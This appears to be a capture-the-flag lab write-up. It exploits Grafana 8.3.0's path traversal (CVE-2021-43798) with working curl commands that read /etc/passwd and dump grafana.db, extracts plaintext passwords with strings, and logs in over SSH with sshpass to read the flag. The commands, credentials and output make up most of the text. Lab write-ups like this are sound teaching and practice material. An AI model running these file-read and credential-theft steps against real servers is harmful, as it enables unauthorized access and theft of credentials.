Routine - I
192.168.1.19OWASPKL{xxx}1. Challenge Overview
Target runs Grafana 8.3.0 + SSH. Path: Grafana path-traversal (CVE-2021-43798) -> dump grafana.db -> extract creds -> SSH for the user flag.
2. Initial Reconnaissance
2.1 Port scan + version check
1nmap -sC -sV -p- -T4 192.168.1.19 -oA routine1_nmap_full2curl -s http://192.168.1.19:3000/api/health122/tcp open ssh OpenSSH 10.2p1 Ubuntu 2ubuntu3.223000/tcp open http Grafana http3{ "commit": "914fcedb72", "database": "ok", "version": "8.3.0" }3. Analysis / Forensics Path
3.1 Path traversal -> /etc/passwd
Grafana 8.3.0 is vulnerable to CVE-2021-43798 (mysql plugin path traversal).
1curl -s --path-as-is 'http://192.168.1.19:3000/public/plugins/mysql/../../../../../../../../etc/passwd' > etc_passwd_via_traversal.txt2egrep 'tellytubby|kdjebat|yunacat|ratusrempah' etc_passwd_via_traversal.txt1yunacat:x:1001:1001::/home/yunacat:/bin/bash2kdjebat:x:1002:1002::/home/kdjebat:/bin/bash3tellytubby:x:1003:1003::/home/tellytubby:/bin/bash4ratusrempah:x:1004:1004::/home/ratusrempah:/bin/bash3.2 Dump grafana.db and extract creds
1curl -s --path-as-is 'http://192.168.1.19:3000/public/plugins/mysql/../../../../../../../../var/lib/grafana/grafana.db' -o grafana.db2strings -n 6 grafana.db | egrep -i 'tellytubby|kdjebat|yunacat|ratusrempah|V4lor4nt|Overw4tch|destiny'1#%ratusrempahpassword123@!2!3tellytubbyV4lor4nt-Anti-cHEAT3/kdjebatOverw4tch1sgoated4%yunacatdestiny4lyfe4. Exploitation / Recovery
4.1 SSH as tellytubby, locate and read the flag
1sshpass -p 'V4lor4nt-Anti-cHEAT' ssh -o StrictHostKeyChecking=no tellytubby@192.168.1.19 'id; hostname; find /home/tellytubby -maxdepth 2 -type f 2>/dev/null | egrep -i "local|flag"; ls -la /home/tellytubby/local.txt; cat /home/tellytubby/local.txt'1uid=1003(tellytubby) gid=1003(tellytubby) groups=1003(tellytubby)2routine3/home/tellytubby/local.txt4-rw-rw-r-- 1 tellytubby tellytubby 42 May 24 01:13 /home/tellytubby/local.txt5OWASPKL{496d5373e7501c9aab3b2658bbad4c02}> Re-validated live on 2026-05-31 via Kali (192.168.1.10): tellytubby:V4lor4nt-Anti-cHEAT logged in and returned the flag above.
5. Flag
6. Summary of Approach & Key Takeaways
nmap found Grafana + SSH; /api/health confirmed 8.3.0.
Used mysql plugin traversal (CVE-2021-43798) to read /etc/passwd.
Dumped /var/lib/grafana/grafana.db via the same traversal.
strings pulled plaintext creds from the DB.
SSH as tellytubby read local.txt.
Always version-fingerprint Grafana; 8.x has a trivial unauthenticated file read.
strings on a SQLite DB often exposes plaintext credentials directly.